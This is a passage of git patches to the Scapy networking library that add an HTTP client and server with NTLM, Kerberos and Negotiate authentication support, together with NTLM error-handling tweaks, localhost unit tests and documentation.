type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 - """Returns a tuple containing (cls, pkt_data, time)""" + """Returns a tuple containing (cls, pkt_data, time) + + + :param x: Maximum number of bytes to be received, defaults to MTU + :return: A tuple, consisting of a Packet type, the received data, + and a timestamp + """ return conf.raw_layer, self.ins.recv(x), None def recv(self, x=MTU, **kwargs): # type: (int, **Any) -> Optional[Packet] + """Receive a Packet according to the `basecls` of this socket + + :param x: Maximum number of bytes to be received, defaults to MTU + :return: The received `Packet` object, or None + """ cls, val, ts = self.recv_raw(x) if not val or not cls: return None @@ -200,6 +225,8 @@ def fileno(self): def close(self): # type: () -> None + """Gracefully close this socket + """ if self.closed: return self.closed = True @@ -213,11 +240,15 @@ def close(self): def sr(self, *args, **kargs): # type: (Any, Any) -> Tuple[SndRcvList, PacketList] + """Send and Receive multiple packets + """ from scapy import sendrecv return sendrecv.sndrcv(self, *args, **kargs) def sr1(self, *args, **kargs): # type: (Any, Any) -> Optional[Packet] + """Send one packet and receive one answer + """ from scapy import sendrecv ans = sendrecv.sndrcv(self, *args, **kargs)[0] # type: SndRcvList if len(ans) > 0: From 8461c2ea035e350d63d6e8b68d97fc0c26f54586 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 15 May 2024 16:02:29 +0200 Subject: [PATCH 1281/1632] Add HTTP_Client / HTTP_Server with SSP support (#4389) --- scapy/automaton.py | 2 + scapy/layers/gssapi.py | 16 +- scapy/layers/http.py | 503 ++++++++++++++++++++++++++++--- scapy/layers/kerberos.py | 3 + scapy/layers/msrpce/rpcclient.py | 1 + scapy/layers/ntlm.py | 21 +- scapy/layers/smb.py | 6 +- scapy/layers/smb2.py | 2 +- scapy/layers/smbclient.py | 2 +- scapy/layers/spnego.py | 3 + test/scapy/layers/http.uts | 94 +++++- 11 files changed, 589 insertions(+), 64 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 94ecdce6b6e..3f8862fe09a 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -1520,6 +1520,8 @@ def destroy(self): Destroys a stopped Automaton: this cleanups all opened file descriptors. Required on PyPy for instance where the garbage collector behaves differently. """ + if not hasattr(self, "started"): + return # was never started. if self.isrunning(): raise ValueError("Can't close running Automaton ! Call stop() beforehand") # Close command pipes diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index d3ca8cac56f..1c637a6ce0b 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -142,9 +142,11 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): # heuristics. if _pkt[:2] in [b"\x04\x04", b"\x05\x04"]: from scapy.layers.kerberos import KRB_InnerToken + return KRB_InnerToken elif len(_pkt) >= 4 and _pkt[:4] == b"\x01\x00\x00\x00": from scapy.layers.ntlm import NTLMSSP_MESSAGE_SIGNATURE + return NTLMSSP_MESSAGE_SIGNATURE return cls @@ -260,6 +262,7 @@ class GSS_C_FLAGS(IntFlag): """ Authenticator Flags per RFC2744 req_flags """ + GSS_C_DELEG_FLAG = 0x01 GSS_C_MUTUAL_FLAG = 0x02 GSS_C_REPLAY_FLAG = 0x04 @@ -297,12 +300,16 @@ def __init__(self, req_flags: Optional[GSS_C_FLAGS] = None): if req_flags is None: # Default req_flags = ( - GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG | - GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG + | GSS_C_FLAGS.GSS_C_MUTUAL_FLAG ) self.flags = req_flags self.passive = False + def clifailure(self): + # This allows to reset the client context without discarding it. + pass + def __repr__(self): return "[Default SSP]" @@ -312,8 +319,9 @@ class STATE(IntEnum): """ @abc.abstractmethod - def GSS_Init_sec_context(self, Context: CONTEXT, val=None, - req_flags: Optional[GSS_C_FLAGS] = None): + def GSS_Init_sec_context( + self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + ): """ GSS_Init_sec_context: client-side call for the SSP """ diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 3f8812f534f..8a12fdf31a4 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -39,25 +39,37 @@ # It was reimplemented for scapy 2.4.3+ using sessions, stream handling. # Original Authors : Steeve Barbeau, Luca Invernizzi +import base64 +import datetime import gzip import io import os import re import socket +import ssl import struct import subprocess +from enum import Enum + from scapy.compat import plain_str, bytes_encode +from scapy.automaton import Automaton, ATMT from scapy.config import conf from scapy.consts import WINDOWS -from scapy.error import warning, log_loading +from scapy.error import warning, log_loading, log_interactive, Scapy_Exception from scapy.fields import StrField from scapy.packet import Packet, bind_layers, bind_bottom_up, Raw -from scapy.supersocket import StreamSocket +from scapy.supersocket import StreamSocket, SSLStreamSocket from scapy.utils import get_temp_file, ContextManagerSubprocess -from scapy.layers.inet import TCP, TCP_client +from scapy.layers.gssapi import ( + GSS_S_COMPLETE, + GSS_S_FAILURE, + GSS_S_CONTINUE_NEEDED, + GSSAPI_BLOB, +) +from scapy.layers.inet import TCP try: import brotli @@ -400,6 +412,7 @@ def self_build(self, **kwargs): if self.raw_packet_cache is not None: return self.raw_packet_cache p = b"" + encodings = self._get_encodings() # Walk all the fields, in order for i, f in enumerate(self.fields_desc): if f.name == "Unknown_Headers": @@ -407,8 +420,16 @@ def self_build(self, **kwargs): # Get the field value val = self.getfieldval(f.name) if not val: - # Not specified. Skip - continue + if f.name == "Content_Length" and "chunked" not in encodings: + # Add Content-Length anyways + val = str(len(self.payload or b"")) + elif f.name == "Date" and isinstance(self, HTTPResponse): + val = datetime.datetime.utcnow().strftime( + '%a, %d %b %Y %H:%M:%S GMT' + ) + else: + # Not specified. Skip + continue if i >= 3: val = _header_line(f.real_name, val) @@ -454,6 +475,11 @@ def __init__(self, name, default): name = _strip_header_name(name) StrField.__init__(self, name, default, fmt="H") + def i2repr(self, pkt, x): + if isinstance(x, bytes): + return x.decode(errors="backslashreplace") + return x + def _generate_headers(*args): """Generate the header fields based on their name""" @@ -507,8 +533,7 @@ def do_dissect(self, s): def mysummary(self): return self.sprintf( - "%HTTPRequest.Method% %HTTPRequest.Path% " - "%HTTPRequest.Http_Version%" + "%HTTPRequest.Method% '%HTTPRequest.Path%' " ) @@ -552,8 +577,7 @@ def do_dissect(self, s): def mysummary(self): return self.sprintf( - "%HTTPResponse.Http_Version% %HTTPResponse.Status_Code% " - "%HTTPResponse.Reason_Phrase%" + "%HTTPResponse.Status_Code% %HTTPResponse.Reason_Phrase%" ) # General HTTP class + defragmentation @@ -694,57 +718,212 @@ def guess_payload_class(self, payload): return Raw +class HTTP_AUTH_MECHS(Enum): + NONE = "NONE" + BASIC = "Basic" + NTLM = "NTLM" + NEGOTIATE = "Negotiate" + + +class HTTP_Client(object): + """ + A basic HTTP client + + :param mech: one of HTTP_AUTH_MECHS + :param ssl: whether to use HTTPS or not + :param ssp: the SSP object to use for binding + """ + + def __init__( + self, + mech=HTTP_AUTH_MECHS.NONE, + verb=True, + sslcontext=None, + ssp=None, + no_check_certificate=False, + ): + self.sock = None + self._sockinfo = None + self.authmethod = mech + self.verb = verb + self.sslcontext = sslcontext + self.ssp = ssp + self.sspcontext = None + self.no_check_certificate = no_check_certificate + + def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): + # Get the port + if port is None: + if tls: + port = 443 + else: + port = 80 + # If the current socket matches, keep it. + if self._sockinfo == (host, port): + return + # A new socket is needed + if self._sockinfo: + self.close() + sock = socket.socket() + sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) + sock.settimeout(timeout) + if self.verb: + print( + "\u2503 Connecting to %s on port %s%s..." + % ( + host, + port, + " with SSL" if tls else "", + ) + ) + sock.connect((host, port)) + if self.verb: + print( + conf.color_theme.green( + "\u2514 Connected from %s" % repr(sock.getsockname()) + ) + ) + if tls: + if self.sslcontext is None: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + if self.no_check_certificate: + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + else: + context = self.sslcontext + sock = context.wrap_socket(sock) + self.sock = SSLStreamSocket(sock, HTTP) + else: + self.sock = StreamSocket(sock, HTTP) + # Store information regarding the current socket + self._sockinfo = (host, port) + + def sr1(self, req, **kwargs): + if self.verb: + print(conf.color_theme.opening(">> %s" % req.summary())) + resp = self.sock.sr1( + HTTP() / req, + verbose=0, + **kwargs, + ) + if self.verb: + print( + conf.color_theme.success( + "<< %s" % (resp and resp.summary()) + ) + ) + return resp + + def request(self, url, data=b"", timeout=5, follow_redirects=True, **headers): + """ + Perform a HTTP(s) request. + """ + # Parse request url + m = re.match(r"(https?)://([^/:]+)(?:\:(\d+))?(?:/(.*))?", url) + if not m: + raise ValueError("Bad URL !") + transport, host, port, path = m.groups() + if transport == "https": + tls = True + else: + tls = False + + path = path or "/" + port = port and int(port) + + # Connect (or reuse) socket + self._connect_or_reuse(host, port=port, tls=tls, timeout=timeout) + + # Build request + http_headers = { + "Accept_Encoding": b'gzip, deflate', + "Cache_Control": b'no-cache', + "Pragma": b'no-cache', + "Connection": b'keep-alive', + "Host": host, + "Path": path, + } + http_headers.update(headers) + req = HTTP() / HTTPRequest(**http_headers) + if data: + req /= data + + while True: + # Perform the request. + resp = self.sr1(req) + if not resp: + break + # First case: auth was required. Handle that + if resp.Status_Code in [b"401", b"407"]: + # Authentication required + if self.authmethod in [ + HTTP_AUTH_MECHS.NTLM, + HTTP_AUTH_MECHS.NEGOTIATE, + ]: + # Parse authenticate + if b" " in resp.WWW_Authenticate: + method, data = resp.WWW_Authenticate.split(b" ", 1) + try: + ssp_blob = GSSAPI_BLOB(base64.b64decode(data)) + except Exception: + raise Scapy_Exception("Invalid WWW-Authenticate") + else: + method = resp.WWW_Authenticate + ssp_blob = None + if plain_str(method) != self.authmethod.value: + raise Scapy_Exception("Invalid WWW-Authenticate") + # SPNEGO / Kerberos / NTLM + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, + ssp_blob, + req_flags=0, + ) + if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + raise Scapy_Exception("Authentication failure") + req.Authorization = ( + self.authmethod.value.encode() + b" " + + base64.b64encode(bytes(token)) + ) + continue + # Second case: follow redirection + if resp.Status_Code in [b"301", b"302"] and follow_redirects: + return self.request( + resp.Location.decode(), + data=data, + timeout=timeout, + follow_redirects=follow_redirects, + **headers, + ) + break + return resp + + def close(self): + if self.verb: + print("X Connection to %s closed\n" % repr(self.sock.ins.getpeername())) + self.sock.close() + + def http_request(host, path="/", port=80, timeout=3, - display=False, verbose=0, - raw=False, iface=None, - **headers): - """Util to perform an HTTP request, using the TCP_client. + display=False, verbose=0, **headers): + """ + Util to perform an HTTP request. :param host: the host to connect to :param path: the path of the request (default /) :param port: the port (default 80) :param timeout: timeout before None is returned :param display: display the result in the default browser (default False) - :param raw: opens a raw socket instead of going through the OS's TCP - socket. Scapy will then use its own TCP client. - Careful, the OS might cancel the TCP connection with RST. :param iface: interface to use. Changing this turns on "raw" :param headers: any additional headers passed to the request :returns: the HTTPResponse packet """ - http_headers = { - "Accept_Encoding": b'gzip, deflate', - "Cache_Control": b'no-cache', - "Pragma": b'no-cache', - "Connection": b'keep-alive', - "Host": host, - "Path": path, - } - http_headers.update(headers) - req = HTTP() / HTTPRequest(**http_headers) - ans = None - - # Open a socket - if iface is not None: - raw = True - if raw: - sock = TCP_client.tcplink(HTTP, host, port, debug=verbose, - iface=iface) - else: - # Use a native TCP socket - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - sock = StreamSocket(sock, HTTP) - # Send the request and wait for the answer - try: - ans = sock.sr1( - req, - timeout=timeout, - verbose=verbose - ) - finally: - sock.close() + client = HTTP_Client(HTTP_AUTH_MECHS.NONE, verb=verbose) + ans = client.request( + "http://%s:%s%s" % (host, port, path), + timeout=timeout, + ) + if ans: if display: if Raw not in ans: @@ -772,3 +951,231 @@ def http_request(host, path="/", port=80, timeout=3, bind_bottom_up(TCP, HTTP, sport=8080) bind_bottom_up(TCP, HTTP, dport=8080) + + +# Automatons + +class HTTP_Server(Automaton): + """ + HTTP server automaton + + :param ssp: the SSP to serve. If None, unauthenticated (or basic). + :param mech: the HTTP_AUTH_MECHS to use (default: NONE) + + Other parameters: + + :param BASIC_IDENTITIES: a dict that contains {"user": "password"} for Basic + authentication. + :param BASIC_REALM: the basic realm. + """ + + pkt_cls = HTTP + + def __init__( + self, + mech=HTTP_AUTH_MECHS.NONE, + ssp=None, + verb=True, + *args, + **kwargs, + ): + self.verb = verb + if "sock" not in kwargs: + raise ValueError( + "HTTP_Server cannot be started directly ! Use SMB_Server.spawn" + ) + self.ssp = ssp + self.authmethod = mech.value + self.sspcontext = None + self.basic = False + self.BASIC_IDENTITIES = kwargs.pop("BASIC_IDENTITIES", {}) + self.BASIC_REALM = kwargs.pop("BASIC_REALM", "default") + if mech == HTTP_AUTH_MECHS.BASIC: + if not self.BASIC_IDENTITIES: + raise ValueError("Please provide 'BASIC_IDENTITIES' !") + if ssp is not None: + raise ValueError("Can't use 'BASIC_IDENTITIES' with 'ssp' !") + self.basic = True + elif mech == HTTP_AUTH_MECHS.NONE: + if ssp is not None: + raise ValueError("Cannot use ssp with mech=NONE !") + # Initialize + Automaton.__init__(self, *args, **kwargs) + + def send(self, resp): + self.sock.send(HTTP() / resp) + + def vprint(self, s=""): + """ + Verbose print (if enabled) + """ + if self.verb: + if conf.interactive: + log_interactive.info("> %s", s) + else: + print("> %s" % s) + + @ATMT.state(initial=1) + def BEGIN(self): + self.authenticated = False + self.sspcontext = None + + @ATMT.condition(BEGIN, prio=0) + def should_authenticate(self): + if self.authmethod == HTTP_AUTH_MECHS.NONE: + raise self.SERVE() + else: + raise self.AUTH() + + @ATMT.state() + def AUTH(self): + pass + + @ATMT.state() + def AUTH_ERROR(self, proxy): + self.sspcontext = None + self._ask_authorization(proxy, self.authmethod) + self.vprint("AUTH ERROR") + + @ATMT.condition(AUTH_ERROR) + def allow_reauth(self): + raise self.AUTH() + + def _ask_authorization(self, proxy, data): + if proxy: + self.send( + HTTPResponse( + Status_Code=b"407", + Reason_Phrase=b"Proxy Authentication Required", + Proxy_Authenticate=data, + ) + ) + else: + self.send( + HTTPResponse( + Status_Code=b"401", + Reason_Phrase=b"Unauthorized", + WWW_Authenticate=data, + ) + ) + + @ATMT.receive_condition(AUTH, prio=1) + def received_unauthenticated(self, pkt): + if HTTPRequest in pkt: + self.vprint(pkt.summary()) + if pkt.Method == b"CONNECT": + # HTTP tunnel (proxy) + proxy = True + else: + # HTTP non-tunnel + proxy = False + # Get authorization + if proxy: + authorization = pkt.Proxy_Authorization + else: + authorization = pkt.Authorization + if not authorization: + # Initial ask. + data = self.authmethod + if self.basic: + data += " realm='%s'" % self.BASIC_REALM + self._ask_authorization(proxy, data) + return + # Parse authorization + method, data = authorization.split(b" ", 1) + if plain_str(method) != self.authmethod: + raise self.AUTH_ERROR(proxy) + try: + data = base64.b64decode(data) + except Exception: + raise self.AUTH_ERROR(proxy) + # Now process the authorization + if not self.basic: + try: + ssp_blob = GSSAPI_BLOB(data) + except Exception: + self.sspcontext = None + self._ask_authorization(proxy, self.authmethod) + raise self.AUTH_ERROR(proxy) + # And call the SSP + self.sspcontext, tok, status = self.ssp.GSS_Accept_sec_context( + self.sspcontext, ssp_blob + ) + else: + # This is actually Basic authentication + try: + next( + True + for k, v in self.BASIC_IDENTITIES.items() + if ("%s:%s" % (k, v)).encode() == data + ) + tok, status = None, GSS_S_COMPLETE + except StopIteration: + tok, status = None, GSS_S_FAILURE + # Send answer + if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + raise self.AUTH_ERROR(proxy) + elif status == GSS_S_CONTINUE_NEEDED: + data = self.authmethod.encode() + if tok: + data += b" " + base64.b64encode(bytes(tok)) + self._ask_authorization(proxy, data) + raise self.AUTH() + else: + # Authenticated ! + self.authenticated = True + self.vprint("AUTH OK") + raise self.SERVE(pkt) + + @ATMT.eof(AUTH) + def auth_eof(self): + raise self.CLOSED() + + @ATMT.state(error=1) + def ERROR(self): + self.send( + HTTPResponse( + Status_Code="400", + Reason_Phrase="Bad Request", + ) + ) + + @ATMT.state(final=1) + def CLOSED(self): + self.vprint("CLOSED") + + # Serving + + @ATMT.state() + def SERVE(self, pkt): + answer = self.answer(pkt) + if answer: + self.send(answer) + self.vprint("%s -> %s" % (pkt.summary(), answer.summary())) + else: + self.vprint("%s" % pkt.summary()) + + @ATMT.receive_condition(SERVE) + def new_request(self, pkt): + raise self.SERVE(pkt) + + # DEV: overwrite this function + + def answer(self, pkt): + """ + HTTP_server answer function. + + :param pkt: a HTTPRequest packet + :returns: a HTTPResponse packet + """ + if pkt.Path == b"/": + return HTTPResponse() / ( + "

      OK

      " + ) + else: + return HTTPResponse( + Status_Code=b"404", + Reason_Phrase=b"Not Found", + ) / ( + "

      404 - Not Found

      " + ) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a98ba1544fc..a3e7ec4212b 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -3233,6 +3233,9 @@ def __init__(self, IsAcceptor, req_flags=None): self.RecvSignKeyUsage = 23 super(KerberosSSP.CONTEXT, self).__init__(req_flags=req_flags) + def clifailure(self): + self.__init__(self.IsAcceptor, req_flags=self.flags) + def __repr__(self): if self.U2U: return "KerberosSSP-U2U" diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 251202e1c57..f377fd20301 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -310,6 +310,7 @@ def _bind(self, interface, reqcls, respcls): ) if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # Authentication failed. + self.sspcontext.clifailure() return False resp = self.sr1( reqcls(context_elem=self.get_bind_context(interface)), diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 11eb4703804..12cc8bf5335 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -957,6 +957,7 @@ def MD4le(x): def RC4Init(key): """Alleged RC4""" from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + try: # cryptography > 43.0 from cryptography.hazmat.decrepit.ciphers import ( @@ -981,6 +982,7 @@ def RC4K(key, data): RC4 algorithm. """ from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + try: # cryptography > 43.0 from cryptography.hazmat.decrepit.ciphers import ( @@ -1226,6 +1228,9 @@ def __init__(self, IsAcceptor, req_flags=None): self.IsAcceptor = IsAcceptor super(NTLMSSP.CONTEXT, self).__init__(req_flags=req_flags) + def clifailure(self): + self.__init__(self.IsAcceptor, req_flags=self.flags) + def __repr__(self): return "NTLMSSP" @@ -1432,8 +1437,8 @@ def GSS_Init_sec_context( "running in standalone !" ) if not chall_tok or NTLM_CHALLENGE not in chall_tok: - chall_tok.show() - raise ValueError("NTLMSSP: Unexpected token. Expected NTLM Challenge") + log_runtime.debug("NTLMSSP: Unexpected token. Expected NTLM Challenge") + return Context, None, GSS_S_DEFECTIVE_TOKEN # Take a default token tok = NTLM_AUTHENTICATE_V2( NegotiateFlags=chall_tok.NegotiateFlags, @@ -1564,8 +1569,8 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # Server: challenge (val=negotiate) nego_tok = val if not nego_tok or NTLM_NEGOTIATE not in nego_tok: - nego_tok.show() - raise ValueError("NTLMSSP: Unexpected token. Expected NTLM Negotiate") + log_runtime.debug("NTLMSSP: Unexpected token. Expected NTLM Negotiate") + return Context, None, GSS_S_DEFECTIVE_TOKEN # Take a default token currentTime = (time.time() + 11644473600) * 1e7 tok = NTLM_CHALLENGE( @@ -1654,10 +1659,10 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # server: OK or challenge again (val=auth) auth_tok = val if not auth_tok or NTLM_AUTHENTICATE_V2 not in auth_tok: - auth_tok.show() - raise ValueError( + log_runtime.debug( "NTLMSSP: Unexpected token. Expected NTLM Authenticate v2" ) + return Context, None, GSS_S_DEFECTIVE_TOKEN if self.DO_NOT_CHECK_LOGIN: # Just trust me bro return Context, None, GSS_S_COMPLETE @@ -1778,7 +1783,7 @@ def _getSessionBaseKey(self, Context, auth_tok): if auth_tok.DomainNameLen: domain = auth_tok.DomainName else: - domain = self.DOMAIN_NB_NAME + domain = "" if self.IDENTITIES and username in self.IDENTITIES: ResponseKeyNT = NTOWFv2( None, username, domain, HashNt=self.IDENTITIES[username] @@ -1802,7 +1807,7 @@ def _checkLogin(self, Context, auth_tok): if auth_tok.DomainNameLen: domain = auth_tok.DomainName else: - domain = self.DOMAIN_NB_NAME + domain = "" if username in self.IDENTITIES: ResponseKeyNT = NTOWFv2( None, username, domain, HashNt=self.IDENTITIES[username] diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 34c1c1f1771..89f19a8c34e 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -5,7 +5,11 @@ # Copyright (C) Gabriel Potter """ -SMB (Server Message Block), also known as CIFS. +SMB 1.0 (Server Message Block), also known as CIFS. + +.. note:: + You will find more complete documentation for this layer over at + `SMB `_ Specs: diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index e22698af643..0d7d3ce1f38 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -4265,7 +4265,7 @@ def __init__(self, *args, **kwargs): @crypto_validator def computeSMBSessionKey(self): - if not self.sspcontext.SessionKey: + if not getattr(self.sspcontext, "SessionKey", None): # no signing key, no session key return # [MS-SMB2] sect 3.3.5.5.3 diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index f63f095657d..01553a7a9c9 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -570,7 +570,7 @@ def receive_setup_andx_response(self, pkt): pass elif SMB2_Error_Response in pkt: # Authentication failure - self.session.sspcontext = None + self.session.sspcontext.clifailure() # Reset Session preauth (SMB 3.1.1) self.session.SessionPreauthIntegrityHashValue = None if not self.RETRY: diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index 89197948ec2..d7a596e1010 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -557,6 +557,9 @@ def __init__( self.supported_mechtypes = force_supported_mechtypes super(SPNEGOSSP.CONTEXT, self).__init__(req_flags=req_flags) + def clifailure(self): + self.sub_context.clifailure() + def __getattr__(self, attr): try: return object.__getattribute__(self, attr) diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index c4ae211a831..2b2134e2f0c 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -221,7 +221,7 @@ assert int(pkts[7][HTTP].Content_Length.decode()) == len(pkts[7][Raw].load) pkt = TCP()/HTTP()/HTTPRequest(Method=b'GET', Path=b'/download', Http_Version=b'HTTP/1.1', Accept=b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', Accept_Encoding=b'gzip, deflate', Accept_Language=b'en-US,en;q=0.5', Cache_Control=b'max-age=0', Connection=b'keep-alive', Host=b'scapy.net', User_Agent=b'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0') raw_pkt = raw(pkt) raw_pkt -assert raw_pkt == b'\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00GET /download HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nHost: scapy.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\n\r\n' +assert raw_pkt == b'\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00GET /download HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nContent-Length: 0\r\nHost: scapy.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\n\r\n' = HTTP 1.1 -> HTTP 2.0 Upgrade (h2c) ~ Test h2c @@ -257,3 +257,95 @@ conf.contribs["http"]["auto_compression"] = True c = sniff(offline=[xa, xb], session=TCPSession)[0] import gzip assert gzip.decompress(z) == c.load + ++ Test HTTP client/server + += Util function to launch HTTP_server +~ http-client + +from scapy.layers.http import HTTP_Server, HTTP_AUTH_MECHS + +class run_httpserver: + def __init__(self, mech=None, ssp=None, **kwargs): + self.server = None + self.mech = mech + self.ssp = ssp + self.kwargs = kwargs + def __enter__(self): + print("@ Starting http server") + # Start server + self.server = HTTP_Server.spawn( + 8080, + iface=conf.loopback_name, + mech=self.mech, ssp=self.ssp, + bg=True, + **self.kwargs, + ) + # wait for it to start + for i in range(10): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(1) + try: + sock.connect(("127.0.0.1", 8080)) + break + except Exception: + time.sleep(0.5) + finally: + sock.close() + else: + raise TimeoutError + print("@ Server started !") + def __exit__(self, exc_type, exc_value, traceback): + print("@ Stopping http server !") + self.server.shutdown(socket.SHUT_RDWR) + if traceback: + # failed + print("\nTest failed.") + raise traceback + print("@ http server stopped !") + + += HTTP_client fails to ask HTTP_server that required authentication +~ http-client + +from scapy.layers.http import HTTP_Client + +with run_httpserver(mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": MD4le("password")})): + client = HTTP_Client() + resp = client.request("http://127.0.0.1:8080") + client.close() + +assert resp.Status_Code == b"401" + += HTTP_client asks HTTP_server with NTLMSSP +~ http-client + +from scapy.layers.http import HTTP_Client + +with run_httpserver(mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": MD4le("password")})): + client = HTTP_Client( + HTTP_AUTH_MECHS.NTLM, + ssp=NTLMSSP(UPN="user", PASSWORD="password"), + ) + resp = client.request("http://127.0.0.1:8080") + client.close() + +assert resp.load == b'

      OK

      ' + += HTTP_Server with native python client with Basic auth +~ http-client + +import urllib.request +from scapy.layers.http import HTTP_Client + +# https://docs.python.org/3/howto/urllib2.html#id5 (this is so complicated...) +password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() +password_mgr.add_password(None, '127.0.0.1:8080', "user", "password") +handler = urllib.request.HTTPBasicAuthHandler(password_mgr) +opener = urllib.request.build_opener(handler) + +with run_httpserver(mech=HTTP_AUTH_MECHS.BASIC, BASIC_IDENTITIES={"user": "password"}): + with opener.open('http://127.0.0.1:8080/') as f: + html = f.read().decode('utf-8') + +assert html == "

      OK

      " From 18082f33c43c0aa5b958f332ba08d7890c2d62ec Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 22 May 2024 21:03:48 +0200 Subject: [PATCH 1282/1632] HTTP_Client/Server doc, other minor win tweaks (#4393) * Add HTTP_Client/HTTP_Server doc, fix tests * Sort arping() results by IP * Various minor Kerberos improvements (packets, client) --- doc/scapy/layers/http.rst | 97 ++++++++++++++++++++++++++++------- scapy/asn1/asn1.py | 2 + scapy/asn1fields.py | 29 ++++++++--- scapy/layers/kerberos.py | 102 +++++++++++++++++++++++++++++++++---- scapy/layers/l2.py | 28 +++++++--- test/scapy/layers/http.uts | 6 ++- test/scapy/layers/l2.uts | 2 +- 7 files changed, 222 insertions(+), 44 deletions(-) diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index aef497386cd..ec9879d1d29 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -84,19 +84,87 @@ All common header fields should be supported. Use Scapy to send/receive HTTP 1.X __________________________________ -To handle this decompression, Scapy uses `Sessions classes <../usage.html#advanced-sniffing-sessions>`_, more specifically the ``TCPSession`` class. -You have several ways of using it: +Scapy uses `Sessions classes <../usage.html#advanced-sniffing-sessions>`_ (more specifically the ``TCPSession`` class), in order to dissect and reconstruct HTTP packets. +This handles Content-Length, chunks and/or compression. -+--------------------------------------------+-------------------------------------------+ -| ``sniff(session=TCPSession, [...])`` | ``TCP_client.tcplink(HTTP, host, 80)`` | -+============================================+===========================================+ -| | Perform decompression / defragmentation | | Acts as a TCP client: handles SYN/ACK, | -| | on all TCP streams simultaneously, but | | and all TCP actions, but only creates | -| | only acts passively. | | one stream. | -+--------------------------------------------+-------------------------------------------+ +Here are the main ways of using HTTP 1.X with Scapy: + +- :class:`~scapy.layers.http.HTTP_Client`: Automata that send HTTP requests. It supports the :func:`~scapy.layers.gssapi.SSP` mechanism to support authorization with NTLM, Kerberos, etc. +- :class:`~scapy.layers.http.HTTP_Server`: Automata to handle incoming HTTP requests. Also supports :func:`~scapy.layers.gssapi.SSP`. +- ``sniff(session=TCPSession, [...])``: Perform decompression / defragmentation on all TCP streams simultaneously, but only acts passively. +- ``TCP_client.tcplink(HTTP, host, 80)``: Acts as a raw TCP client, handles SYN/ACK, and all TCP actions, but only creates one stream. It however supports some specific features, such as changing the source IP. **Examples:** +- :class:`~scapy.layers.http.HTTP_Client`: + +Let's perform a very simple GET request to an HTTP server: + +.. code:: python + + from scapy.layers.http import * # or load_layer("http") + client = HTTP_Client() + resp = 